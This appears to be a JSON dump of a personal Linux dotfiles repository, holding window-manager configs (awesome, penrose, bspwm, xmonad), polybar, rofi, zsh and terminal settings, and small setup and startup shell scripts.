transaction['content']['price_bidder']\n try:\n blockchain.open_auctions[id_auctioneer]['id_bidder']\n except KeyError:\n blockchain.open_auctions[id_auctioneer]['id_bidder'] = None\n if blockchain.open_auctions[id_auctioneer]['id_bidder'] is not None:\n if (blockchain.open_auctions[id_auctioneer]['id_bidder'] != transaction['content']['id_bidder']):\n return False\n if float(blockchain.open_auctions[id_auctioneer]['price_bidder']) < price_bidder :\n blockchain.open_auctions[id_auctioneer]['price_bidder'] = price_bidder\n blockchain.open_auctions[id_auctioneer]['id_bidder'] = transaction['content']['id_bidder']\n return True\n return False\n return False\n \n elif transaction['type'].lower() == 'close':\n id_auctioneer = transaction['content']['id_auctioneer']\n if id_auctioneer in blockchain.open_auctions and blockchain.open_auctions[id_auctioneer]['author'] == transaction['content']['author'] and blockchain.open_auctions[id_auctioneer]['status'] == 'opening':\n blockchain.open_auctions[id_auctioneer]['status'] = 'closed'\n return True\n return False\n elif transaction['type'].lower() == 'smartcontract':\n \n\n try:\n exec(transaction['content']['code'],blockchain.chain_code, blockchain.chain_code)\n return True\n except:\n print('Error contract x01')\n return False\n elif transaction['type'].lower() == 'execute':\n id_auctioneer = transaction['content']['id_auctioneer']\n try:\n blockchain.timeout[id_auctioneer] = False\n time.sleep(0.6)\n blockchain.timeout[id_auctioneer] = True\n thread = threading.Thread(target=blockchain.chain_code[transaction['content']['contract']], args=(\n 
lambda: blockchain.timeout[id_auctioneer], transaction['content']['author'], transaction['content']['id_auctioneer'], transaction['content']['connect'], ))\n thread.start()\n return True\n except:\n print('Error contract x03')\n return False\n \n\n\ndef compute_open_auctions(block, open_auctions, chain_code):\n for transaction in block.transactions:\n \n author = transaction['content']['author']\n url = 'http://{}/validate_permission'.format(anchorsIp)\n response = requests.post(\n url, json={'peer': author, 'action': transaction['type']})\n\n if response.json()['decision'] != 'accept':\n print(\"Reject from server\")\n return False\n if transaction['type'].lower() == 'open':\n id_auctioneer = transaction['content']['id_auctioneer']\n if id_auctioneer not in open_auctions:\n open_auctions[id_auctioneer] = transaction['content']\n return True\n else:\n return True\n return True\n\n\ndef join_network(anchorsIp):\n data = {\n 'port' : \"5000\"\n }\n try:\n url = 'http://{}/add_node'.format(anchorsIp)\n response = requests.post(url, json=data)\n print('Connection successfull')\n return True\n except:\n print(\"Connection refused by the server..\")\n\n return False\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n parser = ArgumentParser()\n parser.add_argument('-p', '--port', default=5000,\n type=int, help='port to listen on')\n parser.add_argument('-a', '--anchorsIp', default='127.0.0.1',\n type=str, help='port to listen on')\n args = parser.parse_args()\n port = args.port\n anchorsIp = args.anchorsIp\n anchorsIp = anchorsIp + \":5001\"\n\n \n while not join_network(anchorsIp):\n print(\"Let me sleep for 10 seconds\")\n time.sleep(1)\n\n app.run(host='127.0.0.1',port=port, debug=True, threaded=True)\n" }, { "alpha_fraction": 0.5606680512428284, "alphanum_fraction": 0.5644171833992004, "avg_line_length": 26.16666603088379, "blob_id": "1fe593c28c6d1fbef0f51e5484c84047eca197a7", "content_id": "d0222030d1f91cdd3b1eca6a25e06217a329acec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3021, "license_type": "no_license", "max_line_length": 85, "num_lines": 108, "path": "/block_server/blockchain.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "from block import Block\nimport time\n\nclass Blockchain(object):\n difficulty = 2\n def __init__(self):\n self.chain = []\n self.timeout = {};\n self.create_genesis_block()\n self.unconfirmed_transactions = []\n self.open_auctions = {}\n self.chain_code = {'chain': self.chain, 'open_auctions': self.open_auctions,\n 'unconfirmed_transactions': self.unconfirmed_transactions}\n def from_list(data_chain):\n blockchain = Blockchain()\n blockchain.chain = []\n blockchain.unconfirmed_transactions = []\n for data_block in data_chain:\n block = Block.from_dict(data_block)\n blockchain.chain.append(block)\n\n return blockchain\n\n def make_json(self):\n chain_data = []\n\n for block in self.chain:\n chain_data.append(block.__dict__)\n \n return chain_data\n\n def create_genesis_block(self):\n \"\"\"\n Tạo khối genesis và gắn nó vào chuỗi.\n      \n \"\"\"\n genesis_block = Block(0, 0, 0, 2, [])\n\n self.proof_of_work(genesis_block)\n\n genesis_block.hash = genesis_block.compute_hash()\n\n self.chain.append(genesis_block)\n @property\n def last_block(self):\n return self.chain[-1]\n\n def add_block(self, block, proof):\n \"\"\"\n Thêm khối vào chuỗi sau khi xác minh.\n        Xác minh bao gồm:\n        * Kiểm tra proof là hợp lệ.\n        * previous_hash đã tham 
chiếu trong khối và hàm băm của khối mới nhất\n          trong chuỗi.\n \"\"\"\n previous_hash = self.last_block.hash\n\n if previous_hash != block.previous_hash:\n return False\n\n if not Blockchain.is_valid_proof(block, proof):\n return False\n\n block.hash = proof\n self.chain.append(block)\n return True\n\n def proof_of_work(self, block):\n \n block.nonce = 0\n\n computed_hash = block.compute_hash()\n while not computed_hash.startswith('0' * Blockchain.difficulty):\n block.nonce += 1\n computed_hash = block.compute_hash()\n\n return computed_hash\n\n def add_new_transaction(self, transaction):\n self.unconfirmed_transactions.append(transaction)\n\n @classmethod\n def is_valid_proof(cls, block, block_hash):\n \"\"\"\n\n \"\"\"\n\n return (block_hash.startswith('0' * Blockchain.difficulty) and\n block_hash == block.compute_hash())\n\n @classmethod\n def check_chain_validity(cls, chain):\n result = True\n previous_hash = \"0\"\n\n for block in chain:\n block_hash = block.hash\n \n delattr(block, \"hash\")\n\n if not cls.is_valid_proof(block, block_hash) or \\\n previous_hash != block.previous_hash:\n result = False\n break\n\n block.hash, previous_hash = block_hash, block_hash\n\n return result\n" }, { "alpha_fraction": 0.584095299243927, "alphanum_fraction": 0.5932391285896301, "avg_line_length": 24.5744686126709, "blob_id": "c89943d3236be243a9479f206f54b887b74a093a", "content_id": "5483880b1360fd36600917aeeee918061713448d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3614, "license_type": "no_license", "max_line_length": 97, "num_lines": 141, "path": "/block_server/order.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import requests\nfrom flask import Flask, jsonify, request\n\nfrom block import Block\nfrom blockchain import Blockchain\n\napp = Flask(__name__)\n\n\nanchors = set()\n\n\[email protected]('/add_node', methods=['POST'])\ndef register_new_anchors():\n data = request.get_json()\n\n if not data:\n return 'Invalid data', 400\n\n request_addr = data['ipaddress']\n port = data['port']\n node = request_addr + ':' + str(port)\n\n if not node:\n return \"Invalid data\", 400\n\n anchors.add(node)\n\n return \"Success\", 201\n\n\[email protected]('/broadcast_block', methods=['POST'])\ndef announce_new_block():\n \"\"\"\n\n \"\"\"\n block = Block.from_dict(request.get_json())\n if not block:\n \treturn \"Invalid data at announce_new_block\", 400\n\n request_addr = request.remote_addr\n\n offline_node = []\n\n for peer in anchors:\n try:\n if peer.find(request_addr) != -1:\n continue\n url = \"http://{}/add_block\".format(peer)\n requests.post(url, json=block.__dict__)\n except requests.exceptions.ConnectionError:\n print('Cant connect to node {}. Remove it from peer list'.format(peer))\n offline_node.append(peer)\n\n for peer in offline_node:\n anchors.remove(peer)\n\n return \"Success\", 201\n\n\[email protected]('/broadcast_transaction', methods=['POST'])\ndef announce_new_transaction():\n\n data = request.get_json()\n if not data:\n return \"Invalid data at announce_new_block\", 400\n\n request_addr = request.remote_addr\n\n offline_node = []\n\n for peer in anchors:\n try:\n if peer.find(request_addr) != -1:\n continue\n url = \"http://{}/get_transaction\".format(peer)\n requests.post(url, json=data)\n except requests.exceptions.ConnectionError:\n print('Cant connect to node {}. 
\n            offline_node.append(peer)\n\n    for peer in offline_node:\n        anchors.remove(peer)\n\n    return \"Success\", 201\n\n\[email protected]('/consensus', methods=['GET'])\ndef consensus():\n    \"\"\"\n    Return the longest valid chain known to any registered node.\n    \"\"\"\n    longest_chain = Blockchain()\n    current_len = len(longest_chain.chain)\n\n    offline_node = []\n\n    for peer in anchors:\n        try:\n            response = requests.get('http://{}/local_chain'.format(peer))\n            length = response.json()['length']\n            chain = response.json()['chain']\n            new_blockchain = Blockchain.from_list(chain)\n\n            if length > current_len and longest_chain.check_chain_validity(new_blockchain.chain):\n                current_len = length\n                longest_chain = new_blockchain\n        except requests.exceptions.ConnectionError:\n            print('Cannot connect to node {}. Removing it from the anchors list'.format(peer))\n            offline_node.append(peer)\n\n    for peer in offline_node:\n        anchors.remove(peer)\n\n    chain_data = []\n\n    for block in longest_chain.chain:\n        chain_data.append(block.__dict__)\n\n    return jsonify({\"length\": len(chain_data),\n                    \"chain\": chain_data})\n\n# return the list and number of registered nodes\[email protected]('/list_nodes', methods=['GET', 'POST'])\ndef get_node():\n    result = {\n        'Nodes in System': list(anchors),\n        'Count of Nodes': len(anchors)\n    }\n    return jsonify(result)\n\n\nif __name__ == '__main__':\n    from argparse import ArgumentParser\n    parser = ArgumentParser()\n    parser.add_argument('-p', '--port', default=5002,\n                        type=int, help='port to listen on')\n    args = parser.parse_args()\n    port = args.port\n\n    app.run(host='127.0.0.1', port=port, debug=True, threaded=True)\n" }, { "alpha_fraction": 0.6200000047683716, "alphanum_fraction": 0.6466666460037231, "avg_line_length": 20.402597427368164, "blob_id": "51e30ebefb12a0faab53f49d13dfeffad366a9ab", "content_id": "2b5e8989d9e6918415b77399230610eafb08ed6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1650, "license_type": "no_license", "max_line_length": 89, "num_lines": 77, "path": "/block_server/anchor.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import requests\nfrom flask import Flask, jsonify, request\nfrom block import Block\n\napp = Flask(__name__)\ngeneral_nodes = set()\n\n\ngroups = {}\n\n# O : Open | C : Close | A : Auction | S : Smartcontract | E : Execute\npermission = {'admin': 'OCASE', 'peer': 'OCASE', 'guest': 'S'}\n\ngroups['127.0.0.1:5000'] = 'admin'\n\n\[email protected]('/add_node', methods=['GET', 'POST'])\ndef validate_connection():\n\tprint(\"connect....\")\n\tdata = request.get_json()\n\trequest_addr = request.remote_addr\n\tprint(request_addr)\n\tif not data:\n\t\treturn 'Invalid data', 400\n\n\tnode = request_addr + ':' + str(data['port'])\n\tif not node:\n\t\treturn 'Invalid data', 400\n\n\tgeneral_nodes.add(node)\n\n\tif node not in groups:\n\t\tgroups[node] = 'peer'\n\n\turl = 'http://{}:5002/add_node'.format(request_addr)\n\tresponse = requests.post(\n\t\turl, json={'ipaddress': request_addr, 'port': data['port']})\n\n\tif response.status_code >= 400:\n\t\treturn 'Failed to connect to the order node', 400\n\n\treturn \"Success\", 201\n\n\[email protected]('/validate_permission', methods=['POST'])\ndef validate_permission():\n\n\tdata = request.get_json()\n\tif not data:\n\t\treturn 'Invalid data', 400\n\n\tnode = data[\"peer\"]\n\n\taction = data[\"action\"]\n\n\tif node not in groups:\n\t\tgroups[node] = 'guest'\n\n\tif permission[groups[node]].find(action[0].upper()) != -1:\n\t\treturn jsonify({'decision': 'accept'})\n\n\treturn jsonify({'decision': 'reject'})
\n\n\nif __name__ == '__main__':\n    from argparse import ArgumentParser\n\n    parser = ArgumentParser()\n    parser.add_argument('-p', '--port', default=5001, type=int, help='port to listen on')\n    args = parser.parse_args()\n    port = args.port\n\n    app.run(host='127.0.0.1', port=port, debug=True, threaded=True)\n" } ]
7
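
The /mine endpoint in app.py above delegates to Blockchain.proof_of_work, a brute-force search for a nonce whose hash starts with `difficulty` leading zeros. block.py is not included in this record, so the following sketch is illustrative only: it assumes compute_hash is a SHA-256 digest over the block's JSON-serialised fields, which is consistent with how blockchain.py and app.py call it.

import json
from hashlib import sha256

class Block:
    # minimal stand-in for the Block class used by the node (assumed shape)
    def __init__(self, index, previous_hash, nonce, difficulty, transactions):
        self.index = index
        self.previous_hash = previous_hash
        self.nonce = nonce
        self.difficulty = difficulty
        self.transactions = transactions

    def compute_hash(self):
        # sort_keys keeps the digest stable; the real block.py may differ
        return sha256(json.dumps(self.__dict__, sort_keys=True).encode()).hexdigest()

def proof_of_work(block, difficulty=2):
    # increment the nonce until the digest gains `difficulty` leading zeros
    block.nonce = 0
    computed = block.compute_hash()
    while not computed.startswith('0' * difficulty):
        block.nonce += 1
        computed = block.compute_hash()
    return computed

print(proof_of_work(Block(1, '0', 0, 2, [])))  # prints a digest beginning with '00'

With difficulty 2 the loop usually terminates after a few hundred attempts; each additional required zero multiplies the expected work by sixteen, which is what makes rewriting a long chain expensive.
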
jamesatha/bug-bash-cluster
https://github.com/jamesatha/bug-bash-cluster
5779180646ee493f10f2a438a13bda7f133158fd
2808d88438ae0c33dbba0b104b81ff76a94a86d6
ff8c36977bd24510a2c6e45fb9309b044ecce756
refs/heads/master
2020-09-10T15:45:58.172821
2019-11-14T16:50:55
2019-11-14T16:50:55
221,744,856
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 26.5, "blob_id": "afffc65b0083af4ef602457ba2f1f19e51e21211", "content_id": "c29938a52b3e5c60c6bd56f06afc72e801b9616e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 54, "num_lines": 4, "path": "/src/github_backed_test.py", "repo_name": "jamesatha/bug-bash-cluster", "src_encoding": "UTF-8", "text": "from . import github_backed\n\ndef test_github_backed():\n assert github_backed.apply(\"Jane\") == \"hello Jane\"\n" }, { "alpha_fraction": 0.7604166865348816, "alphanum_fraction": 0.8229166865348816, "avg_line_length": 47, "blob_id": "b69fe53909d570c1f288d1b9f9b4634f4645680b", "content_id": "08047175d27726c163e68eaa72380e95282b2323", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 96, "license_type": "no_license", "max_line_length": 76, "num_lines": 2, "path": "/README.md", "repo_name": "jamesatha/bug-bash-cluster", "src_encoding": "UTF-8", "text": "# bug-bash-cluster\nSource for https://bash201910.enthalpy.click/algorithms/jamesa/github_backed\n" } ]
2
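
The test in github_backed_test.py above imports a src/github_backed module that is not among this record's two files. A minimal implementation consistent with the assertion might look like the sketch below; the module body is hypothetical, inferred only from the test and not taken from the repository.

# src/github_backed.py (hypothetical -- reconstructed from the test above)
def apply(name):
    # Return a greeting for the given name, e.g. apply("Jane") == "hello Jane"
    return "hello " + name

With such a module in place, pytest would collect and pass the single test.
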
MaikKlein/dotfiles
https://github.com/MaikKlein/dotfiles
497445406012f12f10a82ac71f1138c24a2c9ffb
a2b8a02b6929c36b41db3ad3bec932da48a6665e
de11d3e3865740be1654b4d9314803bbba36ae22
refs/heads/master
2023-06-07T20:54:50.923220
2023-05-27T12:47:48
2023-05-27T12:47:48
13,860,261
4
1
null
null
null
null
null
[ { "alpha_fraction": 0.47105705738067627, "alphanum_fraction": 0.4742030203342438, "avg_line_length": 39.5787239074707, "blob_id": "986414be865f33bf2d6474b1e1ed4377807e64b5", "content_id": "6d4d250216a7d6d94692663a904ac56c6d7ff01e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 9536, "license_type": "no_license", "max_line_length": 106, "num_lines": 235, "path": "/awesome/config/keys.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local apps = require(\"config.apps\")\nlocal layouts = require(\"config.layouts\")\n\nlocal awful = require(\"awful\")\nlocal naughty = require(\"naughty\")\nlocal gears = require(\"gears\")\n\nlocal modkey = \"Mod1\"\n\nlocal general = gears.table.join(\n -- awful.key({ modkey, }, \"s\", hotkeys_popup.show_help,\n -- {description=\"show help\", group=\"awesome\"}),\n -- awful.key({ modkey, }, \"Left\", awful.tag.viewprev,\n -- {description = \"view previous\", group = \"tag\"}),\n -- awful.key({ modkey, }, \"Right\", awful.tag.viewnext,\n -- {description = \"view next\", group = \"tag\"}),\n -- awful.key({ modkey, }, \"Escape\", awful.tag.history.restore,\n -- {description = \"go back\", group = \"tag\"}),\n\n -- awful.key({ modkey, }, \"j\",\n -- function ()\n -- awful.client.focus.byidx( 1)\n -- end,\n -- {description = \"focus next by index\", group = \"client\"}\n -- ),\n -- awful.key({ modkey, }, \"k\",\n -- function ()\n -- awful.client.focus.byidx(-1)\n -- end,\n -- {description = \"focus previous by index\", group = \"client\"}\n -- ),\n -- awful.key({ modkey, }, \"w\", function () mymainmenu:show() end,\n -- {description = \"show main menu\", group = \"awesome\"}),\n\n -- Layout manipulation\n\n awful.key({ modkey, \"Control\" }, \"Left\", function () awful.screen.focus_relative( 1) end,\n {description = \"focus the next screen\", group = \"screen\"}),\n\n awful.key({ modkey, \"Control\" }, \"Right\", function () awful.screen.focus_relative(-1) end,\n {description = \"focus the previous screen\", group = \"screen\"}),\n\n awful.key({ modkey, }, \"u\", awful.client.urgent.jumpto,\n {description = \"jump to urgent client\", group = \"client\"}),\n awful.key({ modkey, }, \"Tab\",\n function ()\n awful.client.focus.history.previous()\n if client.focus then\n client.focus:raise()\n end\n end,\n {description = \"go back\", group = \"client\"}),\n awful.key(\n {\"Ctrl\", },\n \"m\",\n function ()\n awful.client.focus.byidx(-1)\n end,\n {description = \"drun\", group = \"launcher\"}\n ),\n\n -- Standard program\n awful.key({modkey, },\n \"space\",\n function () awful.spawn(\"rofi -show drun\") end,\n {description = \"drun\", group = \"launcher\"}),\n awful.key({},\n \"Print\",\n nil,\n function () awful.util.spawn_with_shell(\"i3-scrot\") end,\n {description = \"drun\", group = \"launcher\"}),\n awful.key({\"Ctrl\", },\n \"Print\",\n nil,\n function () awful.util.spawn_with_shell(\"i3-scrot -s\") end,\n {description = \"drun\", group = \"launcher\"}),\n\n awful.key({ modkey, }, \"Return\", function () awful.spawn(apps.terminal) end,\n {description = \"open a terminal\", group = \"launcher\"}),\n\n awful.key({ modkey, \"Control\" }, \"r\", awesome.restart,\n {description = \"reload awesome\", group = \"awesome\"}),\n awful.key({ modkey, \"Shift\" }, \"q\", awesome.quit,\n {description = \"quit awesome\", group = \"awesome\"}),\n\n awful.key({ modkey, }, \"l\", function () awful.tag.incmwfact( 0.05) end,\n {description = \"increase master width factor\", group = \"layout\"}),\n 
awful.key({ modkey, }, \"h\", function () awful.tag.incmwfact(-0.05) end,\n {description = \"decrease master width factor\", group = \"layout\"}),\n awful.key({ modkey, \"Shift\" }, \"h\", function () awful.tag.incnmaster( 1, nil, true) end,\n {description = \"increase the number of master clients\", group = \"layout\"}),\n awful.key({ modkey, \"Shift\" }, \"l\", function () awful.tag.incnmaster(-1, nil, true) end,\n {description = \"decrease the number of master clients\", group = \"layout\"}),\n awful.key({ modkey, \"Control\" }, \"h\", function () awful.tag.incncol( 1, nil, true) end,\n {description = \"increase the number of columns\", group = \"layout\"}),\n awful.key({ modkey, \"Control\" }, \"l\", function () awful.tag.incncol(-1, nil, true) end,\n {description = \"decrease the number of columns\", group = \"layout\"}),\n -- awful.key({ modkey, }, \"space\", function () awful.layout.inc( 1) end,\n -- {description = \"select next\", group = \"layout\"}),\n\n awful.key({modkey, \"Shift\"},\n \"space\",\n function () awful.layout.inc(-1) end,\n {description = \"select previous\", group = \"layout\"}),\n\n awful.key({ modkey, \"Control\" }, \"n\",\n function ()\n local c = awful.client.restore()\n -- Focus restored client\n if c then\n c:emit_signal(\n \"request::activate\", \"key.unminimize\", {raise = true}\n )\n end\n end,\n {description = \"restore minimized\", group = \"client\"}),\n\n -- Prompt\n -- awful.key({ modkey }, \"r\", function () awful.screen.focused().mypromptbox:run() end,\n -- {description = \"run prompt\", group = \"launcher\"}),\n\n awful.key({ modkey }, \"x\",\n function ()\n awful.prompt.run {\n prompt = \"Run Lua code: \",\n textbox = awful.screen.focused().mypromptbox.widget,\n exe_callback = awful.util.eval,\n history_path = awful.util.get_cache_dir() .. \"/history_eval\"\n }\n end,\n {description = \"lua execute prompt\", group = \"awesome\"}),\n -- Menubar\n awful.key({ modkey }, \"p\", function() menubar.show() end,\n {description = \"show the menubar\", group = \"launcher\"}),\n awful.key(\n { modkey },\n \"t\",\n function()\n awful.layout.set(\"tile\", awful.screen.focused())\n end,\n {description = \"show the menubar\", group = \"launcher\"})\n)\n\nfor _, dir in ipairs({\"Left\", \"Right\", \"Up\", \"Down\"}) do\n local lower_dir = string.lower(dir)\n local focus =\n awful.key(\n {modkey, },\n dir,\n function ()\n local screen = awful.screen.focused()\n local layout = awful.layout.get(screen)\n local layout_name = awful.layout.getname(layout)\n if(layout_name == \"tile\" ) then\n awful.client.focus.bydirection(lower_dir, nil, true)\n else\n if dir == \"Up\" then\n awful.client.focus.byidx(-1)\n end\n if dir == \"Down\" then\n awful.client.focus.byidx(1)\n end\n end\n\n end,\n {description = \"focus \" .. dir .. \"client\", group = \"client\"}\n )\n\n local swap = \n awful.key(\n {modkey, \"Shift\"},\n dir,\n function () awful.client.swap.bydirection(lower_dir) end,\n {description = \"swap the \" .. dir .. \" client\", group = \"client\"})\n\n general = gears.table.join(general, focus, swap)\nend\n\n\n\nlocal workspace = {}\n-- Bind all key numbers to tags.\n-- Be careful: we use keycodes to make it work on any keyboard layout.\n-- This should map on the top row of your keyboard, usually 1 to 9.\nfor i = 1, 9 do\n workspace = gears.table.join(workspace,\n -- View tag only.\n awful.key({ \"Control\" }, \"#\" .. 
i + 9,\n function ()\n local screen = awful.screen.focused()\n local tag = screen.tags[i]\n if tag then\n tag:view_only()\n end\n end,\n {description = \"view tag #\"..i, group = \"tag\"}),\n -- Toggle tag display.\n awful.key({ modkey, \"Control\" }, \"#\" .. i + 9,\n function ()\n local screen = awful.screen.focused()\n local tag = screen.tags[i]\n if tag then\n awful.tag.viewtoggle(tag)\n end\n end,\n {description = \"toggle tag #\" .. i, group = \"tag\"}),\n -- Move client to tag.\n awful.key({ \"Control\", \"Shift\" }, \"#\" .. i + 9,\n function ()\n if client.focus then\n local tag = client.focus.screen.tags[i]\n if tag then\n client.focus:move_to_tag(tag)\n end\n end\n end,\n {description = \"move focused client to tag #\"..i, group = \"tag\"}),\n -- Toggle tag on focused client.\n awful.key({ modkey, \"Control\", \"Shift\" }, \"#\" .. i + 9,\n function ()\n if client.focus then\n local tag = client.focus.screen.tags[i]\n if tag then\n client.focus:toggle_tag(tag)\n end\n end\n end,\n {description = \"toggle focused client on tag #\" .. i, group = \"tag\"})\n )\nend\n\nreturn {\n general = general,\n workspace = workspace\n}\n" }, { "alpha_fraction": 0.6404958963394165, "alphanum_fraction": 0.6487603187561035, "avg_line_length": 23.200000762939453, "blob_id": "4d9f6f1f2cebb3e4035b5ed02cdb8a1c281e2d47", "content_id": "3d4a6123e861ceeaddb36e0c4906053399829719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 242, "license_type": "no_license", "max_line_length": 68, "num_lines": 10, "path": "/penrose/config/polybar/launch.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\n\nkillall -q polybar\nwhile pgrep -u $UID -x polybar >/dev/null; do\n sleep 1;\ndone\n\nfor m in $(xrandr --query | grep \" connected\" | cut -d\" \" -f1); do\n MONITOR=$m polybar --reload main -c ~/.config/polybar/config.ini &\ndone\n" }, { "alpha_fraction": 0.753505527973175, "alphanum_fraction": 0.7616236209869385, "avg_line_length": 45.72413635253906, "blob_id": "2f20fb7ba6e10c604f300fec4dc55de6c3d70d5f", "content_id": "787d4a30ac16b068dd7aa01726185bdacd83a969", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 258, "num_lines": 29, "path": "/penrose/README.md", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "<image width=\"100px\" src=\"icon.svg\" align=\"left\"></image>\nMy Penrose Config\n=================\n\npenrose: [![Build](https://github.com/sminez/penrose/workflows/Build/badge.svg?branch=master)](https://github.com/sminez/penrose/actions?query=workflow%3ABuild) [![crates.io version](https://img.shields.io/crates/v/penrose)](https://crates.io/crates/penrose)\n\nThis is my personal config for the penrose tiling WM library.\nIt relies heavily on a number of custom scripts and external programs, in\naddition to being heavily customised for my day to day workflow. You probably\ndon't want to use everything that is here but you may find some things of\ninterest that you want for your own config.\n\n\n### Supporting files\nI have included some of the `scripts` and `.config` directories that I use in my\npersonal set up which is what you will see in the\n[YouTube](https://www.youtube.com/channel/UC04N-5DxEWH4ioK0bvZmF_Q) videos\nshowcasing penrose.\n\n\n### Wallpaper\nThe wallpaper that I use is, fittingly, a penrose tiling. 
It was generated using\na wonderful [online tool](https://misc.0o0o.org/penrose/) that I found which you\ncan use to generate your own wallpapers should you wish. You'll need to use a\ntool such as `imagemagick` to convert the SVG generated by the site into\nsomething like a PNG so that you can use it as a wallpaper.\n\n\n![wallpaper](wallpaper.png)\n" }, { "alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 16.571428298950195, "blob_id": "338c377af784b696e67d437d76b65dd6c5ad6e89", "content_id": "e988698a5b29dc006e990521714642168790c09a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 123, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/install-arch.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo dependencies-arch.sh\nsh oh-my-zsh.sh\nsh config.sh\nsh source-code-pro.sh\nsh rust.sh\nsh gitconfig.sh\nsh alacritty.sh\n" }, { "alpha_fraction": 0.745945930480957, "alphanum_fraction": 0.7513513565063477, "avg_line_length": 45.25, "blob_id": "977e250862b3eee20bd21be277647087e1b2f496", "content_id": "8c30a5d7ec557836cddd1dcd0732251941f0ae6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 185, "license_type": "no_license", "max_line_length": 69, "num_lines": 4, "path": "/penrose/scripts/lock-screen", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#! /bin/bash\n# Run the multi-monitor aware lock script with a custom icon and font\n# The script itself is `i3lock-fancy`\nbash ~/bin/scripts/lock --pixelate --font ProFont-for-Powerline\n" }, { "alpha_fraction": 0.6191319823265076, "alphanum_fraction": 0.6324180960655212, "avg_line_length": 31.257143020629883, "blob_id": "185e83bc3a7dffc924f2197888d4622be1435261", "content_id": "f0f6ec40e00c8526a615a5449fb0943603104514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1129, "license_type": "no_license", "max_line_length": 94, "num_lines": 35, "path": "/penrose/scripts/penrose-startup.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env bash\n# ----------------------------------------\n# Bootstrap the start of a penrose session\n# >> This get's run on restart as well!\n# ----------------------------------------\n\n# Make sure we only run once\npid=$$\npgrep -fi penrose-startup.sh | grep -v \"^$pid$\" | xargs kill\n\n# Set screen resolutions (add additional screens here)\nxrandr --output HDMI-1 --auto --right-of eDP-1 &\n\nrunning() { pgrep -fi \"$1\" >/dev/null; }\n\nrunning kdeconnnectd || /usr/lib/kdeconnectd &\nrunning nm-applet || nm-applet &\nrunning udiskie || udiskie -a -n -t &\nrunning xautolock || xautolock \\\n -detectsleep \\\n -time 3 \\\n -locker \"$HOME/bin/lock-screen\" \\\n -notify 30 \\\n -notifier \"notify-send -u critical -t 120 -- 'LOCKING screen in 30 seconds...'\" &\nrunning volumeicon || volumeicon &\nrunning dunst || dunst &\nrunning blueman-applet || blueman-applet &\nrunning xfce4-power-manager || xfce4-power-manager &\nrunning gnome-keyring-daemon || gnome-keyring-daemon --start --components=pkcs11,secrets,ssh &\n\n\"$HOME/.fehbg\"\n\"$HOME/.config/polybar/launch.sh\" &\n\n# see run-penrose.sh\n[[ -z \"$RESTARTED\" ]] && \"$HOME/bin/unlock-ssh.sh\" &\n" }, { "alpha_fraction": 0.6659209728240967, "alphanum_fraction": 0.7158836722373962, "avg_line_length": 28.15217399597168, "blob_id": "c46b1dca1fd7d405cf6dc3348e3893353b7be9f4", "content_id": "6f275afbca39732398ee3006033001cdcb2e0069", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 114, "num_lines": 46, "path": "/bspwm/.config/bspwm/bspwmrc", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#! /bin/sh\n\n\npgrep -x sxhkd > /dev/null || sxhkd &\nxrandr --output DP-2 --mode 2560x1440 -r 240.00 --primary --right-of DP-0 --output DP-0 --mode 2560x1440 -r 120.00\n\nbspc monitor DP-2 -d 1 2 3 4 5 6 7 8\nbspc monitor DP-0 -d 9\nbspc wm --reorder-monitors DP-2 DP-0\nbspc monitor -f DP-2\n\nbspc config border_width 1\nbspc config window_gap 12\n\nbspc config split_ratio 0.52\nbspc config borderless_monocle true\nbspc config gapless_monocle true\nbspc config normal_border_color '#fdf6e3'\nbspc config focused_border_color '#0d667d'\nbspc config gapless_monocle false\n\n\nbspc rule -a Gimp desktop='^8' state=floating follow=off\nbspc rule -a Chromium desktop='^4'\nbspc rule -a mplayer2 state=floating\nbspc rule -a Kupfer.py focus=on\nbspc rule -a Screenkey manage=off\nbspc rule -a Steam desktop='^9' state=tiled follow=off\nbspc rule -a Emacs state=tiled\nbspc rule -a Terminator state=tiled\n\n\n#xrdb ~/.Xresources\n#compton --config ~/compton.conf &\n#feh --bg-scale dotfiles/wallpapers/firewatch-blue.jpg &\n#polybar example &\n#xinput --set-prop 10 'Device Accel Profile' -1 &\n#xset s 0 s blank &\n#xset -dpms &\n#xrandr -r 120 &\n#xsetroot -cursor_name left_ptr &\n#gsettings set org.gnome.desktop.background show-desktop-icons false &\n#emacs --daemon\nfeh --bg-scale dotfiles/wallpapers/nms.png &\nxset s 0 s blank &\nxset -dpms &\n" }, { "alpha_fraction": 0.6396760940551758, 